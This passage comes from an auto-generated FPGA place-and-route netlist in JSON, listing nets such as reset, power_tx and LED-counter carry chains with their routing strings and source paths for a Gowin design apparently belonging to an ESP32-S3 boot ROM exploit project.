"X3Y14/E130;X3Y14/E130/Q4;1;X3Y14/C3;X3Y14/C3/E130;1;X3Y14/S100;X3Y14/S100/Q4;1;X3Y14/D5;X3Y14/D5/S100;1;X3Y14/Q4;;1;X3Y14/N100;X3Y14/N100/Q4;1;X3Y13/W240;X3Y13/W240/N101;1;X1Y13/C3;X1Y13/C3/W242;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:25.11-25.18", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0[1]": { + "hide_name": 0, + "bits": [ 7930 ] , + "attributes": { + "ROUTING": "X3Y14/B7;X3Y14/B7/W111;1;X3Y14/B5;X3Y14/B5/W111;1;X4Y14/Q2;;1;X4Y14/EW10;X4Y14/EW10/Q2;1;X3Y14/W210;X3Y14/W210/W111;1;X1Y14/N210;X1Y14/N210/W212;1;X1Y13/B3;X1Y13/B3/N211;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:25.11-25.18", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7926 ] , + "attributes": { + "ROUTING": "X1Y13/F3;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7925 ] , + "attributes": { + "ROUTING": "X1Y13/F2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 7923 ] , + "attributes": { + "ROUTING": "X1Y13/OF0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 7922 ] , + "attributes": { + "ROUTING": "X1Y13/OF2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7918 ] , + "attributes": { + "ROUTING": "X3Y11/F5;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7917 ] , + "attributes": { + "ROUTING": "X3Y11/F4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7913 ] , + "attributes": { + "ROUTING": "X3Y11/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7912 ] , + "attributes": { + "ROUTING": "X3Y11/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 7910 ] , + "attributes": { + "ROUTING": "X3Y11/OF4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 7909 ] , + "attributes": { + "ROUTING": "X3Y11/OF6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_1_D": { + "hide_name": 0, + "bits": [ 7907 ] , + "attributes": { + "ROUTING": "X3Y11/OF5;;1;X3Y11/EW20;X3Y11/EW20/OF5;1;X4Y11/C0;X4Y11/C0/E121;1;X4Y11/XD0;X4Y11/XD0/C0;1" + } + }, + "rst_DFF_Q_D": { + "hide_name": 0, + "bits": [ 7905 ] , + "attributes": { + "ROUTING": "X1Y13/OF1;;1;X1Y13/SN10;X1Y13/SN10/OF1;1;X1Y14/D4;X1Y14/D4/S111;1;X1Y14/XD4;X1Y14/XD4/D4;1" + } + }, + "rst[0]": { + "hide_name": 0, + "bits": [ 7902 ] , + "attributes": { + "ROUTING": "X3Y13/S230;X3Y13/S230/S222;1;X3Y14/B3;X3Y14/B3/S231;1;X3Y13/B6;X3Y13/B6/X07;1;X3Y11/B6;X3Y11/B6/W111;1;X3Y14/C7;X3Y14/C7/W241;1;X3Y11/B5;X3Y11/B5/W111;1;X3Y11/B4;X3Y11/B4/W111;1;X4Y11/EW10;X4Y11/EW10/Q0;1;X3Y11/B7;X3Y11/B7/W111;1;X4Y11/EW20;X4Y11/EW20/Q0;1;X3Y11/S220;X3Y11/S220/W121;1;X3Y13/X07;X3Y13/X07/S222;1;X3Y13/B7;X3Y13/B7/X07;1;X4Y11/Q0;;1;X4Y11/S100;X4Y11/S100/Q0;1;X4Y12/S240;X4Y12/S240/S101;1;X4Y14/W240;X4Y14/W240/S242;1;X3Y14/C5;X3Y14/C5/W241;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:24.11-24.14" + } + }, + "rst[1]": { + "hide_name": 0, + "bits": [ 7901 ] , + "attributes": { + "ROUTING": "X1Y13/A0;X1Y13/A0/N111;1;X3Y11/A4;X3Y11/A4/E272;1;X1Y13/A2;X1Y13/A2/N111;1;X1Y13/A1;X1Y13/A1/N111;1;X1Y14/S130;X1Y14/S130/Q4;1;X1Y14/E250;X1Y14/E250/S130;1;X3Y14/A7;X3Y14/A7/E252;1;X3Y11/A5;X3Y11/A5/E272;1;X3Y14/A3;X3Y14/A3/X07;1;X3Y11/A6;X3Y11/A6/E272;1;X3Y13/A6;X3Y13/A6/E272;1;X1Y14/SN10;X1Y14/SN10/Q4;1;X1Y13/A3;X1Y13/A3/N111;1;X1Y13/E270;X1Y13/E270/N131;1;X3Y13/A7;X3Y13/A7/E272;1;X1Y14/E240;X1Y14/E240/Q4;1;X3Y14/X07;X3Y14/X07/E242;1;X3Y14/A5;X3Y14/A5/X07;1;X1Y14/Q4;;1;X1Y14/N130;X1Y14/N130/Q4;1;X1Y13/N270;X1Y13/N270/N131;1;X1Y11/E270;X1Y11/E270/N272;1;X3Y11/A7;X3Y11/A7/E272;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "power_tx_reg_DFFS_Q_D_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7898 ] , + "attributes": { + "ROUTING": "X3Y13/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "power_tx_reg_DFFS_Q_D_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7897 ] , + "attributes": { + "ROUTING": "X3Y13/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "power_tx_reg_DFFS_Q_D": { + "hide_name": 0, + "bits": [ 7895 ] , + "attributes": { + "ROUTING": "X3Y13/OF6;;1;X3Y13/SN20;X3Y13/SN20/OF6;1;X3Y14/D2;X3Y14/D2/S121;1;X3Y14/XD2;X3Y14/XD2/D2;1" + } + }, + "power_tx": { + "hide_name": 0, + "bits": [ 7410 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:6.12-6.20" + } + }, + "power_tx_reg[0]": { + "hide_name": 0, + "bits": [ 7893 ] , + "attributes": { + "ROUTING": "X3Y13/C6;X3Y13/C6/N111;1;X3Y14/E810;X3Y14/E810/Q2;1;X11Y14/E810;X11Y14/E810/E818;1;X19Y14/E820;X19Y14/E820/E818;1;X27Y14/E820;X27Y14/E820/E828;1;X35Y14/E820;X35Y14/E820/E828;1;X43Y14/E820;X43Y14/E820/E828;1;X46Y14/N270;X46Y14/N270/W824;1;X46Y12/A0;X46Y12/A0/N272;1;X3Y14/Q2;;1;X3Y14/SN10;X3Y14/SN10/Q2;1;X3Y13/C7;X3Y13/C7/N111;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:22.11-22.23" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0[3]": { + "hide_name": 0, + "bits": [ 7889 ] , + "attributes": { + "ROUTING": "X1Y13/B1;X1Y13/B1/W212;1;X3Y11/C5;X3Y11/C5/E230;1;X3Y13/S240;X3Y13/S240/S212;1;X3Y14/W240;X3Y14/W240/S241;1;X1Y14/C6;X1Y14/C6/W242;1;X3Y11/E100;X3Y11/E100/OF1;1;X3Y11/W800;X3Y11/W800/E100;1;X4Y11/W200;X4Y11/W200/E808;1;X3Y11/D7;X3Y11/D7/W201;1;X3Y13/W210;X3Y13/W210/S212;1;X1Y13/X06;X1Y13/X06/W212;1;X1Y13/D3;X1Y13/D3/X06;1;X3Y14/X08;X3Y14/X08/S252;1;X3Y14/C4;X3Y14/C4/X08;1;X3Y11/S210;X3Y11/S210/OF1;1;X1Y13/B0;X1Y13/B0/W212;1;X3Y11/E230;X3Y11/E230/W100;1;X3Y11/C4;X3Y11/C4/E230;1;X3Y12/S250;X3Y12/S250/S111;1;X3Y13/D7;X3Y13/D7/X02;1;X3Y13/X02;X3Y13/X02/S212;1;X3Y11/SN10;X3Y11/SN10/OF1;1;X3Y11/OF1;;1;X3Y11/W100;X3Y11/W100/OF1;1;X2Y11/S200;X2Y11/S200/W101;1;X2Y13/S200;X2Y13/S200/S202;1;X2Y14/C7;X2Y14/C7/S201;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0[4]": { + "hide_name": 0, + "bits": [ 7885 ] , + "attributes": { + "ROUTING": "X2Y12/W130;X2Y12/W130/OF6;1;X1Y12/S230;X1Y12/S230/W131;1;X1Y14/X02;X1Y14/X02/S232;1;X1Y14/D6;X1Y14/D6/X02;1;X1Y13/SEL2;X1Y13/SEL2/W261;1;X3Y11/SEL6;X3Y11/SEL6/E261;1;X2Y13/W260;X2Y13/W260/S121;1;X1Y13/SEL0;X1Y13/SEL0/W261;1;X2Y12/SN20;X2Y12/SN20/OF6;1;X2Y11/E260;X2Y11/E260/N121;1;X3Y11/SEL4;X3Y11/SEL4/E261;1;X3Y12/S270;X3Y12/S270/E131;1;X2Y12/E130;X2Y12/E130/OF6;1;X3Y14/X04;X3Y14/X04/S272;1;X3Y14/D4;X3Y14/D4/X04;1;X2Y12/OF6;;1;X2Y14/X05;X2Y14/X05/S262;1;X2Y12/S260;X2Y12/S260/OF6;1;X2Y14/SEL6;X2Y14/SEL6/X05;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "led_run_LUT4_I0_1_F": { + "hide_name": 0, + "bits": [ 7883 ] , + "attributes": { + "ROUTING": "X2Y14/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F[3]": { + "hide_name": 0, + "bits": [ 7881 ] , + "attributes": { + "ROUTING": "X2Y15/N130;X2Y15/N130/F3;1;X2Y14/D7;X2Y14/D7/N131;1;X2Y15/F3;;1;X2Y15/SN10;X2Y15/SN10/F3;1;X2Y14/C6;X2Y14/C6/N111;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "led_run_LUT3_I0_F": { + "hide_name": 0, + "bits": [ 7880 ] , + "attributes": { + "ROUTING": "X2Y14/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7878 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7876 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7875 ] , + "attributes": { + "ROUTING": "X1Y12/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7873 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7872 ] , + "attributes": { + "ROUTING": "X1Y12/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7870 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7869 ] , + "attributes": { + "ROUTING": "X1Y12/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7867 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7866 ] , + "attributes": { + "ROUTING": "X1Y12/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7864 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7863 ] , + "attributes": { + "ROUTING": "X2Y12/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7861 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7860 ] , + "attributes": { + "ROUTING": "X2Y12/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7858 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7857 ] , + "attributes": { + "ROUTING": "X2Y12/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7855 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7854 ] , + "attributes": { + "ROUTING": "X2Y12/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7852 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7851 ] , + "attributes": { + "ROUTING": "X2Y12/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7849 ] , 